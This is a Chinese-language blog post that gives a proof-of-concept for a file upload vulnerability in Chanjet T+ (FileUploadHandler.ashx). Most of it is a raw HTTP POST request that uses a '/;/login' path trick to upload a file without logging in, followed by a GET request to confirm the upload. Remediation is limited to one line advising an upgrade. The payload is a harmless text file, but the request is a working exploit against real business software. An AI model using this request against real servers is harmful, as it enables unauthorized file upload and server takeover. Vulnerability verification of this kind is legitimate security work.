漏洞验证- 畅捷通T+ FileUploadHandler.ashx 存在文件上传漏洞

一、漏洞描述

畅捷通T+ FileUploadHandler.ashx 存在文件上传漏洞，攻击者可利用该漏洞上传恶意文件控制目标服务器。

二、验证POC

POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 178
Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6

--f95ec6be8c3acff8e3edd3d910d3b9a6
Content-Disposition: form-data; name="file"; filename="test123.txt"
Content-Type: image/jpeg

test123
--f95ec6be8c3acff8e3edd3d910d3b9a6--

GET /tplus/UserFiles/test123.txt HTTP/1.1
Host: XXXX

三、验证截图

四、整改建议

联系官方升级至最新版本。

posted @ 2025-04-22 09:19 Domren 阅读(111) 评论(0) 收藏举报

刷新页面返回顶部

漏洞验证- 畅捷通T+ FileUploadHandler.ashx 存在文件上传漏洞

公告